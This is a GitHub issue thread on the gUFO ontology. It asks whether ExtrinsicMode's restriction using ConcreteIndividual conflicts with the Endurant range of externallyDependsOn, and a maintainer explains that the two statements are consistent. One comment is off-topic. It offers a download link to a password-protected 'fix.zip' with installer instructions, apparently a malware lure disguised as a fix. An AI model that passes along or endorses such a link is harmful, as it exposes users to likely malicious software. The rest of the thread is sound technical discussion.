### ISSUE TITLE
ExtrinsicMode restriction or externallyDependsOn range is incorrect

### ISSUE THREAD

**Issue by ManuelSimoes** [nemo-ufes/gufo#38]
In the documentation ExtrinsicMode has this restriction: "gufo:externallyDependsOn some gufo:ConcreteIndividual". 

But externallyDependsOn has as its stated range "gufo:Endurant", not "gufo:ConcreteIndividual".

So, which statement is correct and which is incorrect?

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jpalmeida** [comment]
I can see why this can cause some questions, but neither are incorrect. Both the range declaration and the restriction are part of the ontology, and together, they make it the case that "gufo:externallyDependsOn some gufo:Endurant".

**Comment by ManuelSimoes** [comment]
Forgive my ignorance and my curiosity, but what purpose is served by stating "gufo:externallyDependsOn some gufo:ConcreteIndividual" if you could've just as easily stated "gufo:externallyDependsOn some gufo:Endurant"? Is there some upside I'm not seeing?

**Comment by jpalmeida** [comment]
Hi Manuel, there's certainly nothing ignorant in your questions and comments ;-) 

We could have in fact stated the more specific statement, which is inferred from the other two. The only upside I can see of the more general statement is that it would remain unchanged in case we would relax the range (for example, should we decide that gufo:externallyDependsOn can have in its range other sorts of concrete individuals.)

**Comment by ManuelSimoes** [comment]
Thanks for clarifying, I had an inkling it could've been that as I've encountered already one case where an externallyDependsOn pointing to an Event seemed like a convenient solution. See also [How to model uncertainty about events?](https://github.com/nemo-ufes/gufo/discussions/28).
